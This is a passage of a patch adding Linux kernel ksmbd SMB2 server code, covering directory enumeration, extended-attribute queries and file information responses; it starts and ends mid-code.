++		fibdinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (fibdinfo->EaSize)
++			fibdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		fibdinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
++		fibdinfo->ShortNameLength = 0;
++		fibdinfo->Reserved = 0;
++		fibdinfo->Reserved2 = cpu_to_le16(0);
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			fibdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(fibdinfo->FileName, conv_name, conv_len);
++		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case SMB_FIND_FILE_POSIX_INFO:
++	{
++		struct smb2_posix_info *posix_info;
++		u64 time;
++
++		posix_info = (struct smb2_posix_info *)kstat;
++		posix_info->Ignored = 0;
++		posix_info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
++		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
++		posix_info->ChangeTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->atime);
++		posix_info->LastAccessTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->mtime);
++		posix_info->LastWriteTime = cpu_to_le64(time);
++		posix_info->EndOfFile = cpu_to_le64(ksmbd_kstat->kstat->size);
++		posix_info->AllocationSize = cpu_to_le64(ksmbd_kstat->kstat->blocks << 9);
++		posix_info->DeviceId = cpu_to_le32(ksmbd_kstat->kstat->rdev);
++		posix_info->HardLinks = cpu_to_le32(ksmbd_kstat->kstat->nlink);
++		posix_info->Mode = cpu_to_le32(ksmbd_kstat->kstat->mode & 0777);
++		posix_info->Inode = cpu_to_le64(ksmbd_kstat->kstat->ino);
++		posix_info->DosAttributes =
++			S_ISDIR(ksmbd_kstat->kstat->mode) ?
++				FILE_ATTRIBUTE_DIRECTORY_LE : FILE_ATTRIBUTE_ARCHIVE_LE;
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			posix_info->DosAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		/*
++		 * SidBuffer(32) contain two sids(Domain sid(16), UNIX group sid(16)).
++		 * UNIX sid(16) = revision(1) + num_subauth(1) + authority(6) +
++		 *		  sub_auth(4 * 1(num_subauth)) + RID(4).
++		 */
++		id_to_sid(from_kuid_munged(&init_user_ns, ksmbd_kstat->kstat->uid),
++			  SIDUNIX_USER, (struct smb_sid *)&posix_info->SidBuffer[0]);
++		id_to_sid(from_kgid_munged(&init_user_ns, ksmbd_kstat->kstat->gid),
++			  SIDUNIX_GROUP, (struct smb_sid *)&posix_info->SidBuffer[16]);
++		memcpy(posix_info->name, conv_name, conv_len);
++		posix_info->name_len = cpu_to_le32(conv_len);
++		posix_info->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++
++	} /* switch (info_level) */
++
++	d_info->last_entry_offset = d_info->data_count;
++	d_info->data_count += next_entry_offset;
++	d_info->out_buf_len -= next_entry_offset;
++	d_info->wptr += next_entry_offset;
++
++	ksmbd_debug(SMB,
++		    "info_level : %d, buf_len :%d, next_offset : %d, data_count : %d\n",
++		    info_level, d_info->out_buf_len,
++		    next_entry_offset, d_info->data_count);
++
++free_conv_name:
++	kfree(conv_name);
++	return rc;
++}
++
++struct smb2_query_dir_private {
++	struct ksmbd_work	*work;
++	char			*search_pattern;
++	struct ksmbd_file	*dir_fp;
++
++	struct ksmbd_dir_info	*d_info;
++	int			info_level;
++};
++
++static void lock_dir(struct ksmbd_file *dir_fp)
++{
++	struct dentry *dir = dir_fp->filp->f_path.dentry;
++
++	inode_lock_nested(d_inode(dir), I_MUTEX_PARENT);
++}
++
++static void unlock_dir(struct ksmbd_file *dir_fp)
++{
++	struct dentry *dir = dir_fp->filp->f_path.dentry;
++
++	inode_unlock(d_inode(dir));
++}
++
++static int process_query_dir_entries(struct smb2_query_dir_private *priv)
++{
++	struct user_namespace	*user_ns = file_mnt_user_ns(priv->dir_fp->filp);
++	struct kstat		kstat;
++	struct ksmbd_kstat	ksmbd_kstat;
++	int			rc;
++	int			i;
++
++	for (i = 0; i < priv->d_info->num_entry; i++) {
++		struct dentry *dent;
++
++		if (dentry_name(priv->d_info, priv->info_level))
++			return -EINVAL;
++
++		lock_dir(priv->dir_fp);
++		dent = lookup_one(user_ns, priv->d_info->name,
++				  priv->dir_fp->filp->f_path.dentry,
++				  priv->d_info->name_len);
++		unlock_dir(priv->dir_fp);
++
++		if (IS_ERR(dent)) {
++			ksmbd_debug(SMB, "Cannot lookup `%s' [%ld]\n",
++				    priv->d_info->name,
++				    PTR_ERR(dent));
++			continue;
++		}
++		if (unlikely(d_is_negative(dent))) {
++			dput(dent);
++			ksmbd_debug(SMB, "Negative dentry `%s'\n",
++				    priv->d_info->name);
++			continue;
++		}
++
++		ksmbd_kstat.kstat = &kstat;
++		if (priv->info_level != FILE_NAMES_INFORMATION)
++			ksmbd_vfs_fill_dentry_attrs(priv->work,
++						    user_ns,
++						    dent,
++						    &ksmbd_kstat);
++
++		rc = smb2_populate_readdir_entry(priv->work->conn,
++						 priv->info_level,
++						 priv->d_info,
++						 &ksmbd_kstat);
++		dput(dent);
++		if (rc)
++			return rc;
++	}
++	return 0;
++}
++
++static int reserve_populate_dentry(struct ksmbd_dir_info *d_info,
++				   int info_level)
++{
++	int struct_sz;
++	int conv_len;
++	int next_entry_offset;
++
++	struct_sz = readdir_info_level_struct_sz(info_level);
++	if (struct_sz == -EOPNOTSUPP)
++		return -EOPNOTSUPP;
++
++	conv_len = (d_info->name_len + 1) * 2;
++	next_entry_offset = ALIGN(struct_sz - 1 + conv_len,
++				  KSMBD_DIR_INFO_ALIGNMENT);
++
++	if (next_entry_offset > d_info->out_buf_len) {
++		d_info->out_buf_len = 0;
++		return -ENOSPC;
++	}
++
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_full_directory_info *ffdinfo;
++
++		ffdinfo = (struct file_full_directory_info *)d_info->wptr;
++		memcpy(ffdinfo->FileName, d_info->name, d_info->name_len);
++		ffdinfo->FileName[d_info->name_len] = 0x00;
++		ffdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_both_directory_info *fbdinfo;
++
++		fbdinfo = (struct file_both_directory_info *)d_info->wptr;
++		memcpy(fbdinfo->FileName, d_info->name, d_info->name_len);
++		fbdinfo->FileName[d_info->name_len] = 0x00;
++		fbdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_DIRECTORY_INFORMATION:
++	{
++		struct file_directory_info *fdinfo;
++
++		fdinfo = (struct file_directory_info *)d_info->wptr;
++		memcpy(fdinfo->FileName, d_info->name, d_info->name_len);
++		fdinfo->FileName[d_info->name_len] = 0x00;
++		fdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_NAMES_INFORMATION:
++	{
++		struct file_names_info *fninfo;
++
++		fninfo = (struct file_names_info *)d_info->wptr;
++		memcpy(fninfo->FileName, d_info->name, d_info->name_len);
++		fninfo->FileName[d_info->name_len] = 0x00;
++		fninfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_id_full_dir_info *dinfo;
++
++		dinfo = (struct file_id_full_dir_info *)d_info->wptr;
++		memcpy(dinfo->FileName, d_info->name, d_info->name_len);
++		dinfo->FileName[d_info->name_len] = 0x00;
++		dinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_id_both_directory_info *fibdinfo;
++
++		fibdinfo = (struct file_id_both_directory_info *)d_info->wptr;
++		memcpy(fibdinfo->FileName, d_info->name, d_info->name_len);
++		fibdinfo->FileName[d_info->name_len] = 0x00;
++		fibdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case SMB_FIND_FILE_POSIX_INFO:
++	{
++		struct smb2_posix_info *posix_info;
++
++		posix_info = (struct smb2_posix_info *)d_info->wptr;
++		memcpy(posix_info->name, d_info->name, d_info->name_len);
++		posix_info->name[d_info->name_len] = 0x00;
++		posix_info->name_len = cpu_to_le32(d_info->name_len);
++		posix_info->NextEntryOffset =
++			cpu_to_le32(next_entry_offset);
++		break;
++	}
++	} /* switch (info_level) */
++
++	d_info->num_entry++;
++	d_info->out_buf_len -= next_entry_offset;
++	d_info->wptr += next_entry_offset;
++	return 0;
++}
++
++static bool __query_dir(struct dir_context *ctx, const char *name, int namlen,
++		       loff_t offset, u64 ino, unsigned int d_type)
++{
++	struct ksmbd_readdir_data	*buf;
++	struct smb2_query_dir_private	*priv;
++	struct ksmbd_dir_info		*d_info;
++	int				rc;
++
++	buf	= container_of(ctx, struct ksmbd_readdir_data, ctx);
++	priv	= buf->private;
++	d_info	= priv->d_info;
++
++	/* dot and dotdot entries are already reserved */
++	if (!strcmp(".", name) || !strcmp("..", name))
++		return true;
++	if (ksmbd_share_veto_filename(priv->work->tcon->share_conf, name))
++		return true;
++	if (!match_pattern(name, namlen, priv->search_pattern))
++		return true;
++
++	d_info->name		= name;
++	d_info->name_len	= namlen;
++	rc = reserve_populate_dentry(d_info, priv->info_level);
++	if (rc)
++		return false;
++	if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY)
++		d_info->out_buf_len = 0;
++	return true;
++}
++
++static int verify_info_level(int info_level)
++{
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	case FILE_DIRECTORY_INFORMATION:
++	case FILE_NAMES_INFORMATION:
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	case SMB_FIND_FILE_POSIX_INFO:
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
++	return 0;
++}
++
++static int smb2_resp_buf_len(struct ksmbd_work *work, unsigned short hdr2_len)
++{
++	int free_len;
++
++	free_len = (int)(work->response_sz -
++		(get_rfc1002_len(work->response_buf) + 4)) - hdr2_len;
++	return free_len;
++}
++
++static int smb2_calc_max_out_buf_len(struct ksmbd_work *work,
++				     unsigned short hdr2_len,
++				     unsigned int out_buf_len)
++{
++	int free_len;
++
++	if (out_buf_len > work->conn->vals->max_trans_size)
++		return -EINVAL;
++
++	free_len = smb2_resp_buf_len(work, hdr2_len);
++	if (free_len < 0)
++		return -EINVAL;
++
++	return min_t(int, out_buf_len, free_len);
++}
++
++int smb2_query_dir(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_query_directory_req *req;
++	struct smb2_query_directory_rsp *rsp;
++	struct ksmbd_share_config *share = work->tcon->share_conf;
++	struct ksmbd_file *dir_fp = NULL;
++	struct ksmbd_dir_info d_info;
++	int rc = 0;
++	char *srch_ptr = NULL;
++	unsigned char srch_flag;
++	int buffer_sz;
++	struct smb2_query_dir_private query_dir_private = {NULL, };
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (ksmbd_override_fsids(work)) {
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		smb2_set_err_rsp(work);
++		return -ENOMEM;
++	}
++
++	rc = verify_info_level(req->FileInformationClass);
++	if (rc) {
++		rc = -EFAULT;
++		goto err_out2;
++	}
++
++	dir_fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!dir_fp) {
++		rc = -EBADF;
++		goto err_out2;
++	}
++
++	if (!(dir_fp->daccess & FILE_LIST_DIRECTORY_LE) ||
++	    inode_permission(file_mnt_user_ns(dir_fp->filp),
++			     file_inode(dir_fp->filp),
++			     MAY_READ | MAY_EXEC)) {
++		pr_err("no right to enumerate directory (%pD)\n", dir_fp->filp);
++		rc = -EACCES;
++		goto err_out2;
++	}
++
++	if (!S_ISDIR(file_inode(dir_fp->filp)->i_mode)) {
++		pr_err("can't do query dir for a file\n");
++		rc = -EINVAL;
++		goto err_out2;
++	}
++
++	srch_flag = req->Flags;
++	srch_ptr = smb_strndup_from_utf16(req->Buffer,
++					  le16_to_cpu(req->FileNameLength), 1,
++					  conn->local_nls);
++	if (IS_ERR(srch_ptr)) {
++		ksmbd_debug(SMB, "Search Pattern not found\n");
++		rc = -EINVAL;
++		goto err_out2;
++	} else {
++		ksmbd_debug(SMB, "Search pattern is %s\n", srch_ptr);
++	}
++
++	if (srch_flag & SMB2_REOPEN || srch_flag & SMB2_RESTART_SCANS) {
++		ksmbd_debug(SMB, "Restart directory scan\n");
++		generic_file_llseek(dir_fp->filp, 0, SEEK_SET);
++	}
++
++	memset(&d_info, 0, sizeof(struct ksmbd_dir_info));
++	d_info.wptr = (char *)rsp->Buffer;
++	d_info.rptr = (char *)rsp->Buffer;
++	d_info.out_buf_len =
++		smb2_calc_max_out_buf_len(work, 8,
++					  le32_to_cpu(req->OutputBufferLength));
++	if (d_info.out_buf_len < 0) {
++		rc = -EINVAL;
++		goto err_out;
++	}
++	d_info.flags = srch_flag;
++
++	/*
++	 * reserve dot and dotdot entries in head of buffer
++	 * in first response
++	 */
++	rc = ksmbd_populate_dot_dotdot_entries(work, req->FileInformationClass,
++					       dir_fp, &d_info, srch_ptr,
++					       smb2_populate_readdir_entry);
++	if (rc == -ENOSPC)
++		rc = 0;
++	else if (rc)
++		goto err_out;
++
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_HIDE_DOT_FILES))
++		d_info.hide_dot_file = true;
++
++	buffer_sz				= d_info.out_buf_len;
++	d_info.rptr				= d_info.wptr;
++	query_dir_private.work			= work;
++	query_dir_private.search_pattern	= srch_ptr;
++	query_dir_private.dir_fp		= dir_fp;
++	query_dir_private.d_info		= &d_info;
++	query_dir_private.info_level		= req->FileInformationClass;
++	dir_fp->readdir_data.private		= &query_dir_private;
++	set_ctx_actor(&dir_fp->readdir_data.ctx, __query_dir);
++
++	rc = iterate_dir(dir_fp->filp, &dir_fp->readdir_data.ctx);
++	/*
++	 * req->OutputBufferLength is too small to contain even one entry.
++	 * In this case, it immediately returns OutputBufferLength 0 to client.
++	 */
++	if (!d_info.out_buf_len && !d_info.num_entry)
++		goto no_buf_len;
++	if (rc > 0 || rc == -ENOSPC)
++		rc = 0;
++	else if (rc)
++		goto err_out;
++
++	d_info.wptr = d_info.rptr;
++	d_info.out_buf_len = buffer_sz;
++	rc = process_query_dir_entries(&query_dir_private);
++	if (rc)
++		goto err_out;
++
++	if (!d_info.data_count && d_info.out_buf_len >= 0) {
++		if (srch_flag & SMB2_RETURN_SINGLE_ENTRY && !is_asterisk(srch_ptr)) {
++			rsp->hdr.Status = STATUS_NO_SUCH_FILE;
++		} else {
++			dir_fp->dot_dotdot[0] = dir_fp->dot_dotdot[1] = 0;
++			rsp->hdr.Status = STATUS_NO_MORE_FILES;
++		}
++		rsp->StructureSize = cpu_to_le16(9);
++		rsp->OutputBufferOffset = cpu_to_le16(0);
++		rsp->OutputBufferLength = cpu_to_le32(0);
++		rsp->Buffer[0] = 0;
++		inc_rfc1001_len(work->response_buf, 9);
++	} else {
++no_buf_len:
++		((struct file_directory_info *)
++		((char *)rsp->Buffer + d_info.last_entry_offset))
++		->NextEntryOffset = 0;
++		if (d_info.data_count >= d_info.last_entry_off_align)
++			d_info.data_count -= d_info.last_entry_off_align;
++
++		rsp->StructureSize = cpu_to_le16(9);
++		rsp->OutputBufferOffset = cpu_to_le16(72);
++		rsp->OutputBufferLength = cpu_to_le32(d_info.data_count);
++		inc_rfc1001_len(work->response_buf, 8 + d_info.data_count);
++	}
++
++	kfree(srch_ptr);
++	ksmbd_fd_put(work, dir_fp);
++	ksmbd_revert_fsids(work);
++	return 0;
++
++err_out:
++	pr_err("error while processing smb2 query dir rc = %d\n", rc);
++	kfree(srch_ptr);
++
++err_out2:
++	if (rc == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else if (rc == -EACCES)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (rc == -ENOENT)
++		rsp->hdr.Status = STATUS_NO_SUCH_FILE;
++	else if (rc == -EBADF)
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++	else if (rc == -ENOMEM)
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++	else if (rc == -EFAULT)
++		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
++	else if (rc == -EIO)
++		rsp->hdr.Status = STATUS_FILE_CORRUPT_ERROR;
++	if (!rsp->hdr.Status)
++		rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, dir_fp);
++	ksmbd_revert_fsids(work);
++	return 0;
++}
++
++/**
++ * buffer_check_err() - helper function to check buffer errors
++ * @reqOutputBufferLength:	max buffer length expected in command response
++ * @rsp:		query info response buffer contains output buffer length
++ * @rsp_org:		base response buffer pointer in case of chained response
++ * @infoclass_size:	query info class response buffer size
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int buffer_check_err(int reqOutputBufferLength,
++			    struct smb2_query_info_rsp *rsp,
++			    void *rsp_org, int infoclass_size)
++{
++	if (reqOutputBufferLength < le32_to_cpu(rsp->OutputBufferLength)) {
++		if (reqOutputBufferLength < infoclass_size) {
++			pr_err("Invalid Buffer Size Requested\n");
++			rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
++			*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
++			return -EINVAL;
++		}
++
++		ksmbd_debug(SMB, "Buffer Overflow\n");
++		rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
++		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr) +
++				reqOutputBufferLength);
++		rsp->OutputBufferLength = cpu_to_le32(reqOutputBufferLength);
++	}
++	return 0;
++}
++
++static void get_standard_info_pipe(struct smb2_query_info_rsp *rsp,
++				   void *rsp_org)
++{
++	struct smb2_file_standard_info *sinfo;
++
++	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
++
++	sinfo->AllocationSize = cpu_to_le64(4096);
++	sinfo->EndOfFile = cpu_to_le64(0);
++	sinfo->NumberOfLinks = cpu_to_le32(1);
++	sinfo->DeletePending = 1;
++	sinfo->Directory = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_standard_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_standard_info));
++}
++
++static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
++				   void *rsp_org)
++{
++	struct smb2_file_internal_info *file_info;
++
++	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
++
++	/* any unique number */
++	file_info->IndexNumber = cpu_to_le64(num | (1ULL << 63));
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_internal_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
++}
++
++static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
++				   struct smb2_query_info_req *req,
++				   struct smb2_query_info_rsp *rsp,
++				   void *rsp_org)
++{
++	u64 id;
++	int rc;
++
++	/*
++	 * Windows can sometime send query file info request on
++	 * pipe without opening it, checking error condition here
++	 */
++	id = req->VolatileFileId;
++	if (!ksmbd_session_rpc_method(sess, id))
++		return -ENOENT;
++
++	ksmbd_debug(SMB, "FileInfoClass %u, FileId 0x%llx\n",
++		    req->FileInfoClass, req->VolatileFileId);
++
++	switch (req->FileInfoClass) {
++	case FILE_STANDARD_INFORMATION:
++		get_standard_info_pipe(rsp, rsp_org);
++		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++				      rsp, rsp_org,
++				      FILE_STANDARD_INFORMATION_SIZE);
++		break;
++	case FILE_INTERNAL_INFORMATION:
++		get_internal_info_pipe(rsp, id, rsp_org);
++		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++				      rsp, rsp_org,
++				      FILE_INTERNAL_INFORMATION_SIZE);
++		break;
++	default:
++		ksmbd_debug(SMB, "smb2_info_file_pipe for %u not supported\n",
++			    req->FileInfoClass);
++		rc = -EOPNOTSUPP;
++	}
++	return rc;
++}
++
++/**
++ * smb2_get_ea() - handler for smb2 get extended attribute command
++ * @work:	smb work containing query info command buffer
++ * @fp:		ksmbd_file pointer
++ * @req:	get extended attribute request
++ * @rsp:	response buffer pointer
++ * @rsp_org:	base response buffer pointer in case of chained response
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_get_ea(struct ksmbd_work *work, struct ksmbd_file *fp,
++		       struct smb2_query_info_req *req,
++		       struct smb2_query_info_rsp *rsp, void *rsp_org)
++{
++	struct smb2_ea_info *eainfo, *prev_eainfo;
++	char *name, *ptr, *xattr_list = NULL, *buf;
++	int rc, name_len, value_len, xattr_list_len, idx;
++	ssize_t buf_free_len, alignment_bytes, next_offset, rsp_data_cnt = 0;
++	struct smb2_ea_info_req *ea_req = NULL;
++	const struct path *path;
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++
++	if (!(fp->daccess & FILE_READ_EA_LE)) {
++		pr_err("Not permitted to read ext attr : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	path = &fp->filp->f_path;
++	/* single EA entry is requested with given user.* name */
++	if (req->InputBufferLength) {
++		if (le32_to_cpu(req->InputBufferLength) <
++		    sizeof(struct smb2_ea_info_req))
++			return -EINVAL;
++
++		ea_req = (struct smb2_ea_info_req *)req->Buffer;
++	} else {
++		/* need to send all EAs, if no specific EA is requested*/
++		if (le32_to_cpu(req->Flags) & SL_RETURN_SINGLE_ENTRY)
++			ksmbd_debug(SMB,
++				    "All EAs are requested but need to send single EA entry in rsp flags 0x%x\n",
++				    le32_to_cpu(req->Flags));
++	}
++
++	buf_free_len =
++		smb2_calc_max_out_buf_len(work, 8,
++					  le32_to_cpu(req->OutputBufferLength));
++	if (buf_free_len < 0)
++		return -EINVAL;
++
++	rc = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
++	if (rc < 0) {
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		goto out;
++	} else if (!rc) { /* there is no EA in the file */
++		ksmbd_debug(SMB, "no ea data in the file\n");
++		goto done;
++	}
++	xattr_list_len = rc;
++
++	ptr = (char *)rsp->Buffer;
++	eainfo = (struct smb2_ea_info *)ptr;
++	prev_eainfo = eainfo;
++	idx = 0;
++
++	while (idx < xattr_list_len) {
++		name = xattr_list + idx;
++		name_len = strlen(name);
++
++		ksmbd_debug(SMB, "%s, len %d\n", name, name_len);
++		idx += name_len + 1;
++
++		/*
++		 * CIFS does not support EA other than user.* namespace,
++		 * still keep the framework generic, to list other attrs
++		 * in future.
++		 */
++		if (strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
++			continue;
++
++		if (!strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
++			     STREAM_PREFIX_LEN))
++			continue;
++
++		if (req->InputBufferLength &&
++		    strncmp(&name[XATTR_USER_PREFIX_LEN], ea_req->name,
++			    ea_req->EaNameLength))
++			continue;
++
++		if (!strncmp(&name[XATTR_USER_PREFIX_LEN],
++			     DOS_ATTRIBUTE_PREFIX, DOS_ATTRIBUTE_PREFIX_LEN))
++			continue;
++
++		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
++			name_len -= XATTR_USER_PREFIX_LEN;
++
++		ptr = (char *)(&eainfo->name + name_len + 1);
++		buf_free_len -= (offsetof(struct smb2_ea_info, name) +
++				name_len + 1);
++		/* bailout if xattr can't fit in buf_free_len */
++		value_len = ksmbd_vfs_getxattr(user_ns, path->dentry,
++					       name, &buf);
++		if (value_len <= 0) {
++			rc = -ENOENT;
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++			goto out;
++		}
++
++		buf_free_len -= value_len;
++		if (buf_free_len < 0) {
++			kfree(buf);
++			break;
++		}
++
++		memcpy(ptr, buf, value_len);
++		kfree(buf);
++
++		ptr += value_len;
++		eainfo->Flags = 0;
++		eainfo->EaNameLength = name_len;
++
++		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
++			memcpy(eainfo->name, &name[XATTR_USER_PREFIX_LEN],
++			       name_len);
++		else
++			memcpy(eainfo->name, name, name_len);
++
++		eainfo->name[name_len] = '\0';
++		eainfo->EaValueLength = cpu_to_le16(value_len);
++		next_offset = offsetof(struct smb2_ea_info, name) +
++			name_len + 1 + value_len;
++
++		/* align next xattr entry at 4 byte bundary */
++		alignment_bytes = ((next_offset + 3) & ~3) - next_offset;
++		if (alignment_bytes) {
++			memset(ptr, '\0', alignment_bytes);
++			ptr += alignment_bytes;
++			next_offset += alignment_bytes;
++			buf_free_len -= alignment_bytes;
++		}
++		eainfo->NextEntryOffset = cpu_to_le32(next_offset);
++		prev_eainfo = eainfo;
++		eainfo = (struct smb2_ea_info *)ptr;
++		rsp_data_cnt += next_offset;
++
++		if (req->InputBufferLength) {
++			ksmbd_debug(SMB, "single entry requested\n");
++			break;
++		}
++	}
++
++	/* no more ea entries */
++	prev_eainfo->NextEntryOffset = 0;
++done:
++	rc = 0;
++	if (rsp_data_cnt == 0)
++		rsp->hdr.Status = STATUS_NO_EAS_ON_FILE;
++	rsp->OutputBufferLength = cpu_to_le32(rsp_data_cnt);
++	inc_rfc1001_len(rsp_org, rsp_data_cnt);
++out:
++	kvfree(xattr_list);
++	return rc;
++}
++
++static void get_file_access_info(struct smb2_query_info_rsp *rsp,
++				 struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_access_info *file_info;
++
++	file_info = (struct smb2_file_access_info *)rsp->Buffer;
++	file_info->AccessFlags = fp->daccess;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_access_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_access_info));
++}
++
++static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
++			       struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_basic_info *basic_info;
++	struct kstat stat;
++	u64 time;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		pr_err("no right to read the attributes : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	basic_info = (struct smb2_file_basic_info *)rsp->Buffer;
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++	basic_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	basic_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	basic_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	basic_info->ChangeTime = cpu_to_le64(time);
++	basic_info->Attributes = fp->f_ci->m_fattr;
++	basic_info->Pad1 = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_basic_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_basic_info));
++	return 0;
++}
++
++static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
++				   struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_standard_info *sinfo;
++	unsigned int delete_pending;
++	struct inode *inode;
++	struct kstat stat;
++
++	inode = file_inode(fp->filp);
++	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
++
++	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
++	delete_pending = ksmbd_inode_pending_delete(fp);
++
++	sinfo->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
++	sinfo->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	sinfo->NumberOfLinks = cpu_to_le32(get_nlink(&stat) - delete_pending);
++	sinfo->DeletePending = delete_pending;
++	sinfo->Directory = S_ISDIR(stat.mode) ? 1 : 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_standard_info));
++	inc_rfc1001_len(rsp_org,
++			sizeof(struct smb2_file_standard_info));
++}
++
++static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
++				    void *rsp_org)
++{
++	struct smb2_file_alignment_info *file_info;
++
++	file_info = (struct smb2_file_alignment_info *)rsp->Buffer;
++	file_info->AlignmentRequirement = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_alignment_info));
++	inc_rfc1001_len(rsp_org,
++			sizeof(struct smb2_file_alignment_info));
++}
++
++static int get_file_all_info(struct ksmbd_work *work,
++			     struct smb2_query_info_rsp *rsp,
++			     struct ksmbd_file *fp,
++			     void *rsp_org)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_file_all_info *file_info;
++	unsigned int delete_pending;
++	struct inode *inode;
++	struct kstat stat;
++	int conv_len;
++	char *filename;
++	u64 time;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		ksmbd_debug(SMB, "no right to read the attributes : 0x%x\n",
++			    fp->daccess);
++		return -EACCES;
++	}
++
